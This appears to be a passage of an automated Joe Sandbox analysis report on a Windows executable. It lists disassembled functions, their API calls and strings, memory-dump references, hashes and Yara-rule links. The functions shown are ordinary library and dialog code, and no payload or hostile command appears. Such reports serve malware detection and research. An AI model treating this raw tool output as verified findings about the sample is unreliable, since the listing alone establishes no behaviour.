                                                                                        • CloseHandle.KERNEL32(?,?), ref: 00370F3B
                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00370F54
                                                                                        • CloseHandle.KERNEL32(?), ref: 00370F60
                                                                                        • CloseHandle.KERNEL32(?), ref: 00370F6C
                                                                                          • Part of subcall function 00370FE4: WaitForSingleObject.KERNEL32(?,000000FF,00371101,?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FEA
                                                                                          • Part of subcall function 00370FE4: GetLastError.KERNEL32(?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1868215902-0
                                                                                        • Opcode ID: 5b7a6289f6356d1a32747eeca9d9fa5474b81e03151852c1217bfb5452b11ab9
                                                                                        • Instruction ID: 2540cb79de1d536b33339be99f21791785d6b2a5ca31c59d679d19df51c4339d
                                                                                        • Opcode Fuzzy Hash: 5b7a6289f6356d1a32747eeca9d9fa5474b81e03151852c1217bfb5452b11ab9
                                                                                        • Instruction Fuzzy Hash: 070152B2100744EFC7339B64DC85BC6FBADFB08710F00492AF16B52160C7767A44CA50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0038C817
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038C829
                                                                                        • _free.LIBCMT ref: 0038C83B
                                                                                        • _free.LIBCMT ref: 0038C84D
                                                                                        • _free.LIBCMT ref: 0038C85F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                        • Instruction ID: 46e246b9cff99683a1bcdb29ba8f61ddc732b224907f67ebed3d41024a568e75
                                                                                        • Opcode Fuzzy Hash: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                        • Instruction Fuzzy Hash: EAF01232954344ABC623FB68E485C1673EEAB00714B95289AF108DB652CB71FC80CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00371FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00371FE5
                                                                                        • _wcslen.LIBCMT ref: 00371FF6
                                                                                        • _wcslen.LIBCMT ref: 00372006
                                                                                        • _wcslen.LIBCMT ref: 00372014
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CompareString
                                                                                        • String ID:
                                                                                        • API String ID: 3397213944-0
                                                                                        • Opcode ID: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
                                                                                        • Instruction ID: 500c147e3d789b1729b36346a75a0682b44d037ee8d599e7130045a8b6348dae
                                                                                        • Opcode Fuzzy Hash: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
                                                                                        • Instruction Fuzzy Hash: 4AF01D33008118BBDF336F51EC09D8E7F26EB44B61B118455F61A5E161CB72E665D790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003715FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _swprintf
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 589789837-2259941744
                                                                                        • Opcode ID: 80905c10131662a49b89ed977ad96e9b765932a19f04c7e21ea3248a50cb2ae4
                                                                                        • Instruction ID: 4005c1dbf0b4d9e1592dc56fe50f3dbb7ab59a9aa8f3d422c131353fccbe4bed
                                                                                        • Opcode Fuzzy Hash: 80905c10131662a49b89ed977ad96e9b765932a19f04c7e21ea3248a50cb2ae4
                                                                                        • Instruction Fuzzy Hash: 10511B3B248300F6E63716ACCD46F76767DAB05B04F24C50AF7DE788D5C5AAA410AB1B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00387F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\CJF0Ri1HrG.exe,00000104), ref: 00387FAE
                                                                                        • _free.LIBCMT ref: 00388079
                                                                                        • _free.LIBCMT ref: 00388083
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                        • API String ID: 2506810119-1541805510
                                                                                        • Opcode ID: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
                                                                                        • Instruction ID: c3bd64f079113663e3a65c8c0dcfe78438bd6cbf1f9bd66a2369291d6eed04e5
                                                                                        • Opcode Fuzzy Hash: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
                                                                                        • Instruction Fuzzy Hash: BD31A0B1A00319BFCB23EF99DC80D9EBBACEB95310F5540E6E5049B211DA719A458B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003831D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003831FB
                                                                                        • _abort.LIBCMT ref: 00383306
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer_abort
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 948111806-2084237596
                                                                                        • Opcode ID: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
                                                                                        • Instruction ID: 7c39c817586a8f7520cd006003ccbae12b4043431660e008f2a3589bbd1025bc
                                                                                        • Opcode Fuzzy Hash: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
                                                                                        • Instruction Fuzzy Hash: BD414A71900209AFCF16EF94CD81AEEBBB5FF48704F158499F90467222D735AA50DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00367401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00367406
                                                                                          • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                        • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 003674CD
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 3813983858-639343689
                                                                                        • Opcode ID: 2fb3206f85ce590bba1891877f46b05f3e6271c38bf3b4603dbf4ae6fb0ab840
                                                                                        • Instruction ID: 6df6cedd948a9ba727add404d29af704531cd2ba40e63fd3d1e573a911c65129
                                                                                        • Opcode Fuzzy Hash: 2fb3206f85ce590bba1891877f46b05f3e6271c38bf3b4603dbf4ae6fb0ab840
                                                                                        • Instruction Fuzzy Hash: 9A31B671D04258AADF13EBA4DC45FEEBB7CAF06308F04C055F505AB285DB748A44CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037AD98
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037ADAD
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037ADC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        • Opcode ID: 44457c27d0e20460fdcbd78b31d4150a6061aaa4cc116c52bd6b1006496f6242
                                                                                        • Instruction ID: 049f476b3164c0a2057a3753c1ce438da2f4c5648dc024d2dbcbcdc08448ee6c
                                                                                        • Opcode Fuzzy Hash: 44457c27d0e20460fdcbd78b31d4150a6061aaa4cc116c52bd6b1006496f6242
                                                                                        • Instruction Fuzzy Hash: 2211E632280600BFD7339F68DC55FAE7BADEF8B742F018000F245DB5A5CB65A9159B22
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010420,0037B270,?,?), ref: 0037DE18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DialogParam
                                                                                        • String ID: GETPASSWORD1$r7$xz;
                                                                                        • API String ID: 665744214-399909694
                                                                                        • Opcode ID: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
                                                                                        • Instruction ID: 7b4b6185393a3f6012e37e20611449c488995c3b6249acd925d5290bfb21ce7d
                                                                                        • Opcode Fuzzy Hash: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
                                                                                        • Instruction Fuzzy Hash: F5110872640154AADB33DA35AC01BEB37ACAF0B750F158464FE4DEB581CAB8AC84C764
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __fprintf_l.LIBCMT ref: 0036D954
                                                                                        • _strncpy.LIBCMT ref: 0036D99A
                                                                                          • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,003A1030,?,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 562999700-834177443
                                                                                        • Opcode ID: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
                                                                                        • Instruction ID: b867f77d23bf70d38f2d50c000a2f9671c4d7283aef5ab099fcd0203fc06bc03
                                                                                        • Opcode Fuzzy Hash: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
                                                                                        • Instruction Fuzzy Hash: 98217572940348AEDF22EEA4CC45FEE7BE8AF05704F048511F954961A6E371D658CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00370E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E85
                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E8F
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E9F
                                                                                        Strings
                                                                                        • Thread pool initialization failed., xrefs: 00370EB7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID: Thread pool initialization failed.
                                                                                        • API String ID: 3340455307-2182114853
                                                                                        • Opcode ID: c87ff230c179b4d5074ccefe7df8de5edac34bca8f5bd0372c25873dafa24baa
                                                                                        • Instruction ID: 6500cd86575770bf4040ef7d36992d1a2fd7538c36ed604b91f9162df0083e0f
                                                                                        • Opcode Fuzzy Hash: c87ff230c179b4d5074ccefe7df8de5edac34bca8f5bd0372c25873dafa24baa
                                                                                        • Instruction Fuzzy Hash: 341191B1600B08DFC3365F7ADC84AABFBECEB55744F10882EF1DAC6600D67599408B50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Malloc
                                                                                        • String ID: (7$27$A
                                                                                        • API String ID: 2696272793-678002403
                                                                                        • Opcode ID: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
                                                                                        • Instruction ID: 5d87b810538876cfeb02f0b203db69c2809ddc9b18fd76a3e35f358f242043cb
                                                                                        • Opcode Fuzzy Hash: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
                                                                                        • Instruction Fuzzy Hash: 1A011B72901229ABCB15CFA4D8449DEBBFCEF09300F10855AE906E3200D735AE40CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        • Opcode ID: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
                                                                                        • Instruction ID: c389f4b1af52bab96a1748723b552c50b3561816acaf610474f38ec0ff65fb67
                                                                                        • Opcode Fuzzy Hash: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
                                                                                        • Instruction Fuzzy Hash: 18018076604245AFCB339F55FC44A967FBDEF09384F018425E90982230C6359850DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00361316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0036E2E8: _swprintf.LIBCMT ref: 0036E30E
                                                                                          • Part of subcall function 0036E2E8: _strlen.LIBCMT ref: 0036E32F
                                                                                          • Part of subcall function 0036E2E8: SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                          • Part of subcall function 0036E2E8: GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                          • Part of subcall function 0036E2E8: GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                        • SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
